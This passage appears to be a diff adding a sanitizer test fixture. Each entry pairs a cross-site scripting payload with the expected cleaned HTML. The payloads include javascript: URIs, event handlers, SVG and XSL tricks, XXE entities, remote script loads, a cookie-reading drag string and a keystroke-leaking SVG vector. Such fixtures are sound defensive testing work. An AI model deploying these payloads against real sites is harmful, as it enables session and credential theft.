}, + { + "data": "<OBJECT CLASSID=\"clsid:333C7BC4-460F-11D0-BC04-0080C7055A83\"><PARAM NAME=\"DataURL\" VALUE=\"javascript:alert(1)\"></OBJECT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<object data=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></object>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<embed src=\"data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"></embed>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<x style=\"behavior:url(test.sct)\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<xml id=\"xss\" src=\"test.htc\"></xml>\r\n<label dataformatas=\"html\" datasrc=\"#xss\" datafld=\"payload\"></label>", + "sanitized": "<html><head></head><body>\n<label></label></body></html>" + }, + { + "data": "<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<video><source onerror=\"alert(1)\">", + "sanitized": "<html><head></head><body><video controls=\"controls\"><source></video></body></html>" + }, + { + "data": "<video onerror=\"alert(1)\"><source></source></video>", + "sanitized": "<html><head></head><body><video controls=\"controls\"><source></video></body></html>" + }, + { + "data": "<b <script>alert(1)//</script>0</script></b>", + "sanitized": "<html><head></head><body><b>alert(1)//0</b></body></html>" + }, + { + "data": "<b><script<b></b><alert(1)</script </b></b>", + "sanitized": "<html><head></head><body><b></b></body></html>" + }, + { + "data": "<div id=\"div1\"><input value=\"``onmouseover=alert(1)\"></div> <div id=\"div2\"></div><script>document.getElementById(\"div2\").innerHTML = document.getElementById(\"div1\").innerHTML;</script>", + "sanitized": "<html><head></head><body><div id=\"div1\"></div> <div id=\"div2\"></div></body></html>" + }, + { + 
"data": "<div style=\"[a]color[b]:[c]red\">XXX</div>", + "sanitized": "<html><head></head><body><div>XXX</div></body></html>" + }, + { + "data": "<div style=\"\\63	\\06f
\\0006c\\00006F
\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\ or:blue;\">XXX</div>", + "sanitized": "<html><head></head><body><div>XXX</div></body></html>" + }, + { + "data": "<!-- IE 6-8 -->\r\n<x '=\"foo\"><x foo='><img src=x onerror=alert(1)//'>\r\n\r\n<!-- IE 6-9 -->\r\n<! '=\"foo\"><x foo='><img src=x onerror=alert(2)//'>\r\n<? '=\"foo\"><x foo='><img src=x onerror=alert(3)//'>", + "sanitized": "<html><head></head><body>\n\n\n\n</body></html>" + }, + { + "data": "<embed src=\"javascript:alert(1)\"></embed> // O10.10�, OM10.0�, GC6�, FF\r\n<img src=\"javascript:alert(2)\">\r\n<image src=\"javascript:alert(2)\"> // IE6, O10.10�, OM10.0�\r\n<script src=\"javascript:alert(3)\"></script> // IE6, O11.01�, OM10.1�", + "sanitized": "<html><head></head><body> // O10.10�, OM10.0�, GC6�, FF\n<img>\n<img> // IE6, O10.10�, OM10.0�\n // IE6, O11.01�, OM10.1�</body></html>" + }, + { + "data": "<!DOCTYPE x[<!ENTITY x SYSTEM \"http://html5sec.org/test.xxe\">]><y>&x;</y>", + "sanitized": "<!DOCTYPE x[<!entity>\n<html><head></head><body>]>&x;</body></html>" + }, + { + "data": "<svg onload=\"javascript:alert(1)\" xmlns=\"http://www.w3.org/2000/svg\"></svg>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<?xml version=\"1.0\"?>\n<?xml-stylesheet type=\"text/xsl\" href=\"data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='xss'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3Ealert(1)%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E\"?>\n<root/>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<!DOCTYPE x [\r\n\t<!ATTLIST img xmlns CDATA \"http://www.w3.org/1999/xhtml\" src CDATA \"xx:x\"\r\n onerror CDATA \"alert(1)\"\r\n onload CDATA \"alert(2)\">\r\n]><img />", + "sanitized": "<!DOCTYPE x>\n<html><head></head><body>]><img></body></html>" + }, + { + "data": "<doc xmlns:xlink=\"http://www.w3.org/1999/xlink\" 
xmlns:html=\"http://www.w3.org/1999/xhtml\">\r\n\t<html:style /><x xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\">XXX</x>\r\n</doc>", + "sanitized": "<html><head></head><body>\n\tXXX\n</body></html>" + }, + { + "data": "<card xmlns=\"http://www.wapforum.org/2001/wml\"><onevent type=\"ontimer\"><go href=\"javascript:alert(1)\"/></onevent><timer value=\"1\"/></card>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>", + "sanitized": "<html><head></head><body><div>x</div></body></html>" + }, + { + "data": "<// style=x:expression\\28write(1)\\29>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<form><button formaction=\"javascript:alert(1)\">X</button>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<event-source src=\"event.php\" onload=\"alert(1)\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<a href=\"javascript:alert(1)\"><event-source src=\"data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A\" /></a>", + "sanitized": "<html><head></head><body><a></a></body></html>" + }, + { + "data": "<script<{alert(1)}/></script </>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<?xml-stylesheet type=\"text/css\"?><!DOCTYPE x SYSTEM \"test.dtd\"><x>&x;</x>", + "sanitized": "<!DOCTYPE x SYSTEM \"test.dtd\">\n<html><head></head><body>&x;</body></html>" + }, + { + "data": "<?xml-stylesheet type=\"text/css\"?><root style=\"x:expression(write(1))\"/>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<?xml-stylesheet type=\"text/xsl\" href=\"#\"?><img xmlns=\"x-schema:test.xdr\"/>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<object allowscriptaccess=\"always\" data=\"test.swf\"></object>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": 
"<style>*{x:EXPRESSION(write(1))}</style>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<x xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:actuate=\"onLoad\" xlink:href=\"javascript:alert(1)\" xlink:type=\"simple\"/>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<?xml-stylesheet type=\"text/css\" href=\"data:,*%7bx:expression(write(2));%7d\"?>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<x:template xmlns:x=\"http://www.wapforum.org/2001/wml\" x:ontimer=\"$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:alert(1)\"><x:timer value=\"1\"/></x:template>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"javascript:alert(1)//#x\"/>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<x xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\" ev:handler=\"test.evt#x\"/>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<body oninput=alert(1)><input autofocus>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<a xmlns:xlink=\"http://www.w3.org/1999/xlink\" xlink:href=\"javascript:alert(1)\"><rect width=\"1000\" height=\"1000\" fill=\"white\"/></a>\n</svg>", + "sanitized": "<html><head></head><body>\n\n</body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n\n<animation xlink:href=\"javascript:alert(1)\"/>\n<animation xlink:href=\"data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/>\n\n<image xlink:href=\"data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(1)'%3E%3C/svg%3E\"/>\n\n<foreignObject xlink:href=\"javascript:alert(1)\"/>\n<foreignObject xlink:href=\"data:text/xml,%3Cscript 
xmlns='http://www.w3.org/1999/xhtml'%3Ealert(1)%3C/script%3E\"/>\n\n</svg>", + "sanitized": "<html><head></head><body>\n\n\n\n\n\n\n\n\n\n</body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<set attributeName=\"onmouseover\" to=\"alert(1)\"/>\n<animate attributeName=\"onunload\" to=\"alert(1)\"/>\n</svg>", + "sanitized": "<html><head></head><body>\n\n\n</body></html>" + }, + { + "data": "<!-- Up to Opera 10.63 -->\r\n<div style=content:url(test2.svg)></div>\r\n\r\n<!-- Up to Opera 11.64 - see link below -->\r\n\r\n<!-- Up to Opera 12.x -->\r\n<div style=\"background:url(test5.svg)\">PRESS ENTER</div>", + "sanitized": "<html><head></head><body><div></div>\n\n\n\n\n<div>PRESS ENTER</div></body></html>" + }, + { + "data": "[A]\n<? foo=\"><script>alert(1)</script>\">\n<! foo=\"><script>alert(1)</script>\">\n</ foo=\"><script>alert(1)</script>\">\n[B]\n<? foo=\"><x foo='?><script>alert(1)</script>'>\">\n[C]\n<! foo=\"[[[x]]\"><x foo=\"]foo><script>alert(1)</script>\">\n[D]\n<% foo><x foo=\"%><script>alert(1)</script>\">", + "sanitized": "<html><head></head><body>[A]\n\">\n\">\n\">\n[B]\n\">\n[C]\n\n[D]\n<% foo></body></html>" + }, + { + "data": "<div style=\"background:url(http://foo.f/f oo/;color:red/*/foo.jpg);\">X</div>", + "sanitized": "<html><head></head><body><div>X</div></body></html>" + }, + { + "data": "<div style=\"list-style:url(http://foo.f)\\20url(javascript:alert(1));\">X</div>", + "sanitized": "<html><head></head><body><div>X</div></body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<handler xmlns:ev=\"http://www.w3.org/2001/xml-events\" ev:event=\"load\">alert(1)</handler>\n</svg>", + "sanitized": "<html><head></head><body>\nalert(1)\n</body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\">\n<feImage>\n<set attributeName=\"xlink:href\" 
to=\"data:image/svg+xml;charset=utf-8;base64,\nPHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD48L3N2Zz4NCg%3D%3D\"/>\n</feImage>\n</svg>", + "sanitized": "<html><head></head><body>\n\n\n\n</body></html>" + }, + { + "data": "<iframe src=mhtml:http://html5sec.org/test.html!xss.html></iframe>\n<iframe src=mhtml:http://html5sec.org/test.gif!xss.html></iframe>", + "sanitized": "<html><head></head><body>\n</body></html>" + }, + { + "data": "<!-- IE 5-9 -->\r\n<div id=d><x xmlns=\"><iframe onload=alert(1)\"></div>\n<script>d.innerHTML+='';</script>\r\n\r\n<!-- IE 10 in IE5-9 Standards mode -->\r\n<div id=d><x xmlns='\"><iframe onload=alert(2)//'></div>\n<script>d.innerHTML+='';</script>", + "sanitized": "<html><head></head><body><div id=\"d\"></div>\n\n\n\n<div id=\"d\"></div>\n</body></html>" + }, + { + "data": "<div id=d><div style=\"font-family:'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B'\">X</div></div>\n<script>with(document.getElementById(\"d\"))innerHTML=innerHTML</script>", + "sanitized": "<html><head></head><body><div id=\"d\"><div>X</div></div>\n</body></html>" + }, + { + "data": "XXX<style>\r\n\r\n*{color:gre/**/en !/**/important} /* IE 6-9 Standards mode */\r\n\r\n<!--\r\n--><!--*{color:red} /* all UA */\r\n\r\n*{background:url(xx:x //**/\\red/*)} /* IE 6-7 Standards mode */\r\n\r\n</style>", + "sanitized": "<html><head></head><body>XXX</body></html>" + }, + { + "data": "<img[a][b]src=x[d]onerror[c]=[e]\"alert(1)\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<a href=\"[a]java[b]script[c]:alert(1)\">XXX</a>", + "sanitized": "<html><head></head><body><a>XXX</a></body></html>" + }, + { + "data": "<img src=\"x` `<script>alert(1)</script>\"` `>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<script>history.pushState(0,0,'/i/am/somewhere_else');</script>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<svg 
xmlns=\"http://www.w3.org/2000/svg\" id=\"foo\">\r\n<x xmlns=\"http://www.w3.org/2001/xml-events\" event=\"load\" observer=\"foo\" handler=\"data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E alert(1) %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar\"/>\r\n</svg>", + "sanitized": "<html><head></head><body>\n\n</body></html>" + }, + { + "data": "<iframe src=\"data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03\"></iframe>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<img src onerror /\" '\"= alt=alert(1)//\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<title onpropertychange=alert(1)></title><title title=></title>", + "sanitized": "<html><head><title></title><title title=\"\"></title></head><body></body></html>" + }, + { + "data": "<!-- IE 5-8 standards mode -->\r\n<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\">\r\n\r\n<!-- IE 5-9 standards mode -->\r\n<!a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(2)//\">\r\n<?a foo=x=`y><img alt=\"`><img src=xx:x onerror=alert(3)//\">", + "sanitized": "<html><head></head><body><a href=\"http://foo.bar/#x=%60y\"></a><img alt=\"`><img src=xx:x onerror=alert(1)></a>\">\n\n\n<img alt=\"`><img src=xx:x onerror=alert(2)//\">\n<img alt=\"`><img src=xx:x onerror=alert(3)//\"></body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\">\n<a id=\"x\"><rect fill=\"white\" width=\"1000\" height=\"1000\"/></a>\n<rect fill=\"white\" style=\"clip-path:url(test3.svg#a);fill:url(#b);filter:url(#c);marker:url(#d);mask:url(#e);stroke:url(#f);\"/>\n</svg>", + "sanitized": "<html><head></head><body>\n\n\n</body></html>" + }, + { + "data": "<svg 
xmlns=\"http://www.w3.org/2000/svg\">\r\n<path d=\"M0,0\" style=\"marker-start:url(test4.svg#a)\"/>\r\n</svg>", + "sanitized": "<html><head></head><body>\n\n</body></html>" + }, + { + "data": "<div style=\"background:url(/f#[a]oo/;color:red/*/foo.jpg);\">X</div>", + "sanitized": "<html><head></head><body><div>X</div></body></html>" + }, + { + "data": "<div style=\"font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);\">X</div>", + "sanitized": "<html><head></head><body><div>X</div></body></html>" + }, + { + "data": "<div id=\"x\">XXX</div>\n<style>\n\n#x{font-family:foo[bar;color:green;}\n\n#y];color:red;{}\n\n</style>", + "sanitized": "<html><head></head><body><div id=\"x\">XXX</div>\n</body></html>" + }, + { + "data": "<x style=\"background:url('x[a];color:red;/*')\">XXX</x>", + "sanitized": "<html><head></head><body>XXX</body></html>" + }, + { + "data": "<!--[if]><script>alert(1)</script -->\r\n<!--[if<img src=x onerror=alert(2)//]> -->", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<div id=\"x\">x</div>\n<xml:namespace prefix=\"t\">\n<import namespace=\"t\" implementation=\"#default#time2\">\n<t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"<imgsrc=x:xonerror=alert(1)>\">", + "sanitized": "<html><head></head><body><div id=\"x\">x</div>\n\n\n</body></html>" + }, + { + "data": "<a href=\"http://attacker.org\">\n\t<iframe src=\"http://example.org/\"></iframe>\n</a>", + "sanitized": "<html><head></head><body><a href=\"http://attacker.org\">\n\t\n</a></body></html>" + }, + { + "data": "<div draggable=\"true\" ondragstart=\"event.dataTransfer.setData('text/plain','malicious code');\">\n\t<h1>Drop me</h1>\n</div>\n\n<iframe src=\"http://www.example.org/dropHere.html\"></iframe>", + "sanitized": "<html><head></head><body><div draggable=\"true\">\n\t<h1>Drop me</h1>\n</div>\n\n</body></html>" + }, + { + "data": "<iframe src=\"view-source:http://www.example.org/\" frameborder=\"0\" 
style=\"width:400px;height:180px\"></iframe>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea>", + "sanitized": "<html><head></head><body>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea></body></html>" + }, + { + "data": "<script>\nfunction makePopups(){\n\tfor (i=1;i<6;i++) {\n\t\twindow.open('popup.html','spam'+i,'width=50,height=50');\n\t}\n}\n</script>\n\n<body>\n<a href=\"#\" onclick=\"makePopups()\">Spam</a>", + "sanitized": "<html><head>\n\n</head><body>\n<a href=\"#\">Spam</a></body></html>" + }, + { + "data": "<html xmlns=\"http://www.w3.org/1999/xhtml\"\nxmlns:svg=\"http://www.w3.org/2000/svg\">\n<body style=\"background:gray\">\n<iframe src=\"http://example.com/\" style=\"width:800px; height:350px; border:none; mask: url(#maskForClickjacking);\"/>\n<svg:svg>\n<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\n\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\n\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html>", + "sanitized": "<html><head></head><body>\n\n<svg:svg>\n<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\n\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\n\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html></body></html>" + }, + { + "data": "<iframe sandbox=\"allow-same-origin allow-forms allow-scripts\" src=\"http://example.org/\"></iframe>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<span class=foo>Some text</span>\n<a class=bar href=\"http://www.example.org\">www.example.org</a>\n\n<script src=\"http://code.jquery.com/jquery-1.4.4.js\"></script>\n<script>\n$(\"span.foo\").click(function() {\nalert('foo');\n$(\"a.bar\").click();\n});\n$(\"a.bar\").click(function() 
{\nalert('bar');\nlocation=\"http://html5sec.org\";\n});\n</script>", + "sanitized": "<html><head></head><body><span class=\"foo\">Some text</span>\n<a class=\"bar\" href=\"http://www.example.org\">www.example.org</a>\n\n\n</body></html>" + }, + { + "data": "<script src=\"/\\example.com\\foo.js\"></script> // Safari 5.0, Chrome 9, 10\n<script src=\"\\\\example.com\\foo.js\"></script> // Safari 5.0", + "sanitized": "<html><head> </head><body>// Safari 5.0, Chrome 9, 10\n // Safari 5.0</body></html>" + }, + { + "data": "<?xml version=\"1.0\"?>\r\n<?xml-stylesheet type=\"text/xml\" href=\"#stylesheet\"?>\r\n<!DOCTYPE doc [\r\n<!ATTLIST xsl:stylesheet\r\n id ID #REQUIRED>]>\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n <xsl:stylesheet id=\"stylesheet\" version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\r\n <xsl:template match=\"/\">\r\n <iframe xmlns=\"http://www.w3.org/1999/xhtml\" src=\"javascript:alert(1)\"></iframe>\r\n </xsl:template>\r\n </xsl:stylesheet>\r\n <circle fill=\"red\" r=\"40\"></circle>\r\n</svg>", + "sanitized": "<!DOCTYPE doc>\n<html><head></head><body>]>\n\n \n \n \n \n \n \n</body></html>" + }, + { + "data": "<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object>\r\n<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>", + "sanitized": "<html><head></head><body>\n</body></html>" + }, + { + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"x\">\r\n<listener event=\"load\" handler=\"#y\" xmlns=\"http://www.w3.org/2001/xml-events\" observer=\"x\"/>\r\n<handler id=\"y\">alert(1)</handler>\r\n</svg>", + "sanitized": "<html><head></head><body>\n\nalert(1)\n</body></html>" + }, + { + "data": "<svg><style><img/src=x onerror=alert(1)// </b>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<svg>\n<image style='filter:url(\"data:image/svg+xml,<svg 
xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>\")'>\n<!--\nSame effect with\n<image filter='...'>\n-->\n</svg>", + "sanitized": "<html><head></head><body>\n\n\n</body></html>" + }, + { + "data": "<math href=\"javascript:alert(1)\">CLICKME</math>\r\n\r\n<math>\r\n<!-- up to FF 13 -->\r\n<maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(2)\">CLICKME</maction>\r\n\r\n<!-- FF 14+ -->\r\n<maction actiontype=\"statusline\" xlink:href=\"javascript:alert(3)\">CLICKME<mtext>http://http://google.com</mtext></maction>\r\n</math>", + "sanitized": "<html><head></head><body><math>CLICKME</math>\n\n<math>\n\n<maction actiontype=\"statusline#http://google.com\">CLICKME</maction>\n\n\n<maction actiontype=\"statusline\">CLICKME<mtext>http://http://google.com</mtext></maction>\n</math></body></html>" + }, + { + "data": "<b>drag and drop one of the following strings to the drop box:</b>\r\n<br/><hr/>\r\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>\r\n<br/><hr/>\r\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\n<div id=\"dropbox\" style=\"height: 360px;width: 500px;border: 5px solid #000;position: relative;\" ondragover=\"event.preventDefault()\">+ Drop Box +</div>", + "sanitized": "<html><head></head><body><b>drag and drop one of the following strings to the drop box:</b>\n<br><hr>\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: 
'+document.cookie);//\n<br><hr>\nfeed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>\n<br><hr>\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\n<div id=\"dropbox\">+ Drop Box +</div></body></html>" + }, + { + "data": "<!doctype html>\r\n<form>\r\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\r\n<br>\r\n<input name=\"secret\" type=\"password\">\r\n</form>\r\n<!-- injection --><svg height=\"50px\">\r\n<image xmlns:xlink=\"http://www.w3.org/1999/xlink\">\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(a)\" to=\"//example.com/?a\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(b)\" to=\"//example.com/?b\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(c)\" to=\"//example.com/?c\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(d)\" to=\"//example.com/?d\" />\r\n</image>\r\n</svg>", + "sanitized": "<!DOCTYPE html>\n<html><head></head><body>\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\n<br>\n\n\n\n\n\n\n\n\n\n</body></html>" + }, + { + "data": "<!-- `<img/src=xx:xx onerror=alert(1)//--!>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<xmp>\r\n<%\r\n</xmp>\r\n<img alt='%></xmp><img src=xx:x onerror=alert(1)//'>\r\n\r\n<script>\r\nx='<%'\r\n</script> %>/\r\nalert(2)\r\n</script>\r\n\r\nXXX\r\n<style>\r\n*['<!--']{}\r\n</style>\r\n-->{}\r\n*{color:red}</style>", + "sanitized": "<html><head></head><body>\n<%\n\n<img alt=\"%></xmp><img src=xx:x onerror=alert(1)//\">\n\n %>/\nalert(2)\n\n\nXXX\n\n-->{}\n*{color:red}</body></html>" + }, + { + "data": "<?xml-stylesheet type=\"text/xsl\" href=\"#\" ?>\r\n<stylesheet xmlns=\"http://www.w3.org/TR/WD-xsl\">\r\n<template match=\"/\">\r\n<eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval>\r\n<if 
expr=\"new ActiveXObject('htmlfile').parentWindow.alert(2)\"></if>\r\n</template>\r\n</stylesheet>", + "sanitized": "<html><head></head><body>\n\n</body></html>" + }, + { + "data": "<form action=\"\" method=\"post\">\r\n<input name=\"username\" value=\"admin\" />\r\n<input name=\"password\" type=\"password\" value=\"secret\" />\r\n<input name=\"injected\" value=\"injected\" dirname=\"password\" />\r\n<input type=\"submit\">\r\n</form>", + "sanitized": "<html><head></head><body>\n\n\n\n\n</body></html>" + }, + { + "data": "<SCRIPT>alert('XSS');</SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "'';!--\"<XSS>=&{()}", + "sanitized": "<html><head></head><body>'';!--\"=&{()}</body></html>" + }, + { + "data": "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<IMG SRC=\"javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=javascript:alert('XSS')>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=JaVaScRiPt:alert('XSS')>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=javascript:alert("XSS")>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "SRC=
<IMG 6;avascript:alert('XSS')>", + "sanitized": "<html><head></head><body>SRC=\n<img></body></html>" + }, + { + "data": "<IMG SRC=javascript:alert('XSS')>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=javascript:alert('XSS')>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"jav	ascript:alert('XSS');\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"jav
ascript:alert('XSS');\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"jav
ascript:alert('XSS');\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"  javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<IMG SRC=\"javascript:alert('XSS')\"", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT>a=/XSS/", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "\\\";alert('XSS');//", + "sanitized": "<html><head></head><body>\\\";alert('XSS');//</body></html>" + }, + { + "data": "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<BODY BACKGROUND=\"javascript:alert('XSS')\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<BODY ONLOAD=alert('XSS')>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<IMG DYNSRC=\"javascript:alert('XSS')\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG LOWSRC=\"javascript:alert('XSS')\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<BGSOUND SRC=\"javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<BR SIZE=\"&{alert('XSS')}\">", + "sanitized": "<html><head></head><body><br></body></html>" + }, + { + "data": "<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<LINK REL=\"stylesheet\" 
